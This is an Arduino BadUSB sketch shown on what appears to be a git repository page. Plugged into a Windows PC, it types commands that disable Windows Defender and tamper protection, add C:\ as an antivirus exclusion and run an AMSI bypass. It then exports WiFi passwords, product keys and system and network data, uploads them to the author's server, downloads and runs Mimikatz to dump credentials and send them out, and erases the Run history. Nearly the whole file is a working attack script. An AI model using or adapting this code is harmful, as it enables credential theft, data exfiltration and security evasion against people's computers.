Dominic Reich
7bdf4dc91b
Arduino.mk was taken from https://github.com/sudar/Arduino-Makefile and installed into /usr/share/arduino/makefile (https://repo.oe7drt.net/dominic/Arduino-Makefile)
302 lines
8.6 KiB
C++
302 lines
8.6 KiB
C++
/* badusb.ino
|
|
* Author: Dominic Reich (OE7DRT), dominic@oe7drt.com
|
|
* Created November 25th, 2023
|
|
* Last modified: 2024-12-24T08:58:01+0100 on Arch [Odin] X1
|
|
*
|
|
* Waits 15 seconds after plugged in, then it starts to remove antivirus
|
|
* definitions of Windows Defender and disables monitoring. Right after it
|
|
* disables Anti-Tampering in the Windows-Security GUI.
|
|
* The script collects some useful information about the computer, its
|
|
* network and the currently active routes as well as listening ports and
|
|
* its processes. It also saves (if possible) the product key as well as
|
|
* saved WiFi networks. Finally it launches mimikatz and dumps windows
|
|
* secrets and uploads everything to my webserver via HTTP POST.
|
|
* It then removes the run history (Win+R) and closes the terminal window.
|
|
*
|
|
* Based on the examples from
|
|
* https://www.instructables.com/A-BadUSB-Device-With-Arduino/
|
|
*
|
|
* Following times are outdated as I added some commands which take
|
|
* a few seconds of time:
|
|
* Time until I have everything on my server: ~42 sec
|
|
* Time until script finished locally: ~49 sec
|
|
* Time until execution starts (waiting time): 15 sec
|
|
*/
|
|
|
|
#include <Keyboard.h>
|
|
#define KEY_DELAY 50 //delay between keystrokes for slow computers
|
|
|
|
void disableTampering() {
|
|
// Disable tamper protection with the Windows GUI on Windows 10
|
|
// Tested on my Lenovo T420 running Windows 10 {VERSION}
|
|
Keyboard.press(KEY_LEFT_GUI);
|
|
Keyboard.press('r');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(700);
|
|
|
|
Keyboard.println("windowsdefender:");
|
|
delay(3000);
|
|
|
|
// maximize window because on small screens the focus of the button changes
|
|
Keyboard.press(KEY_LEFT_ALT);
|
|
Keyboard.press(' ');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(200);
|
|
Keyboard.press('x');
|
|
delay(KEY_DELAY);
|
|
Keyboard.release('x');
|
|
delay(400);
|
|
|
|
// Viren- und Bedrohungsschutz (just hit ENTER)
|
|
Keyboard.press(KEY_RETURN);
|
|
delay(KEY_DELAY);
|
|
Keyboard.release(KEY_RETURN);
|
|
delay(1400);
|
|
|
|
// move down to Einstellungen verwalten
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_RETURN);
|
|
delay(KEY_DELAY);
|
|
Keyboard.release(KEY_RETURN);
|
|
delay(1400);
|
|
|
|
|
|
// Disable Echtzeitschutz
|
|
Keyboard.press(' ');
|
|
delay(KEY_DELAY);
|
|
Keyboard.release(' ');
|
|
delay(1400);
|
|
|
|
// yes do it with ALT+j
|
|
Keyboard.press(KEY_LEFT_ALT);
|
|
Keyboard.press('j');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(1400);
|
|
|
|
|
|
// move down to Cloudbasierter Schutz slider
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(' ');
|
|
delay(KEY_DELAY);
|
|
Keyboard.release(' ');
|
|
delay(1400);
|
|
|
|
// go ahead and disable Automatische Übermittlung von Beispielen
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(' ');
|
|
delay(KEY_DELAY);
|
|
Keyboard.release(' ');
|
|
delay(1400);
|
|
|
|
// disable Manipulationsschutz
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(KEY_TAB);
|
|
delay(KEY_RETURN);
|
|
Keyboard.release(KEY_TAB);
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.press(' ');
|
|
delay(KEY_DELAY);
|
|
Keyboard.release(' ');
|
|
delay(1400);
|
|
|
|
// close window with alt f4
|
|
Keyboard.press(KEY_LEFT_ALT);
|
|
Keyboard.press(KEY_F4);
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(700);
|
|
}
|
|
|
|
void setup() {
|
|
// Keyboard.begin();
|
|
Keyboard.begin(KeyboardLayout_de_DE);
|
|
//I recommend that you leave a short delay before start while prototyping.
|
|
//It will will give you some time to reprogram a board before it starts typing.
|
|
delay(15000);
|
|
|
|
// normal program, only run it once at startup
|
|
|
|
disableTampering();
|
|
|
|
// Windows + R
|
|
Keyboard.press(KEY_LEFT_GUI);
|
|
Keyboard.press('r');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(900);
|
|
|
|
// Start cmd as Administrator
|
|
Keyboard.println("powershell Start-Process cmd -Verb runAs");
|
|
delay(4600);
|
|
|
|
// press ALT + j to confirm execution as Administrator
|
|
Keyboard.press(KEY_LEFT_ALT);
|
|
Keyboard.press('j');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(1700);
|
|
|
|
// If no UAC enabled, we printed j on the console, let's
|
|
// initiate a few CTRL+C's to cancel that and get a fresh
|
|
// prompt...
|
|
Keyboard.press(KEY_LEFT_CTRL);
|
|
Keyboard.press('c');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(100);
|
|
|
|
Keyboard.press(KEY_LEFT_CTRL);
|
|
Keyboard.press('c');
|
|
delay(KEY_DELAY);
|
|
Keyboard.releaseAll();
|
|
delay(100);
|
|
|
|
// Disable Defender; wait a bit longer, because recent only `ershell ...` was printed
|
|
Keyboard.println("\"C:\\program files\\windows defender\\mpcmdrun.exe\" -RemoveDefinitions -All Set-MpPreference -DisableOAVProtection $true");
|
|
delay(400);
|
|
|
|
// Start powershell; wait longer because the OS has to bring another window to foreground
|
|
Keyboard.println("powershell");
|
|
delay(2600);
|
|
|
|
// Add C: to Defender exclusion list
|
|
Keyboard.println("Add-MpPreference -ExclusionPath \"C:\\\"");
|
|
delay(400);
|
|
|
|
Keyboard.println("\"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed'.'NonPublic,Static').SetValue($null,$true)\"");
|
|
delay(400);
|
|
|
|
// get some information about the network
|
|
Keyboard.println("cd $ENV:UserProfile");
|
|
delay(400);
|
|
|
|
Keyboard.println("New-Item -Name \"tmp\" -Type Directory -Force");
|
|
delay(100);
|
|
Keyboard.println("cd tmp");
|
|
delay(100);
|
|
|
|
Keyboard.println("netsh wlan export profile key=clear");
|
|
delay(400);
|
|
|
|
Keyboard.println("ipconfig /all > ipc.txt");
|
|
delay(400);
|
|
|
|
Keyboard.println("netstat -rn > nr.txt");
|
|
delay(400);
|
|
Keyboard.println("netstat -anb >> nr.txt");
|
|
delay(400);
|
|
|
|
Keyboard.println("systeminfo > pc.txt");
|
|
delay(4600);
|
|
|
|
Keyboard.println("Get-ComputerInfo > pspc.txt");
|
|
delay(4600);
|
|
|
|
Keyboard.println("Reg export \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform\" prodkey.txt /y");
|
|
delay(400);
|
|
|
|
// ftp connection (windows ftp does not know about passive ftp)
|
|
// Keyboard.println("ftp");
|
|
// delay(200);
|
|
// Keyboard.println("open bor.oe7drt.com");
|
|
// delay(400);
|
|
// Keyboard.println("mimiwauz");
|
|
// delay(400);
|
|
// Keyboard.println("harschbichl");
|
|
// delay(400);
|
|
// Keyboard.println("prompt");
|
|
// delay(400);
|
|
// Keyboard.println("mput *.*");
|
|
// delay(400);
|
|
// Keyboard.println("quit");
|
|
// delay(400);
|
|
|
|
// Keyboard.println("((sc -NoNewLine -Encoding Ascii .\\Report.txt -Value(gc *.*) -join """`n""") + """`n""")");
|
|
// delay(KEY_DELAY);
|
|
// Keyboard.println("$report=gc .\\Report.txt");
|
|
Keyboard.println("$report=gc -Encoding utf8 -Delimiter \"'n\" *.*");
|
|
delay(400);
|
|
|
|
Keyboard.println("(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/rx-net.php',$report)");
|
|
delay(2200);
|
|
|
|
Keyboard.println("cd ..");
|
|
delay(400);
|
|
|
|
Keyboard.println("Remove-Item -Recurse -Force tmp");
|
|
delay(400);
|
|
|
|
// exit powershell (because the next commands have to run in a separated powershell process)
|
|
Keyboard.println("exit");
|
|
delay(2200);
|
|
|
|
// Download and execute mimikatz; then upload result log
|
|
Keyboard.println("powershell \"IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)\"");
|
|
// Keyboard.println("IEX (New-Object Net.WebClient).DownloadString('http://bor.oe7drt.com/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://bor.oe7drt.com/imrx.php',$output)");
|
|
delay(9000);
|
|
|
|
// Clear run history
|
|
Keyboard.println("powershell \"Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue\"");
|
|
// Keyboard.println("Remove-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU' -Name '*' -ErrorAction SilentlyContinue");
|
|
delay(400);
|
|
|
|
// show wlan passwords
|
|
// Keyboard.println("netsh wlan show profile key=clear");
|
|
// delay(8000);
|
|
|
|
// exit cmd window
|
|
Keyboard.println("exit");
|
|
delay(KEY_DELAY);
|
|
|
|
Keyboard.end();
|
|
}
|
|
|
|
void loop() {
|
|
// do nothing in loop() -- or should we restart the computer? or lock it? or delete something?
|
|
// or start a fork bomb etc...
|
|
}
|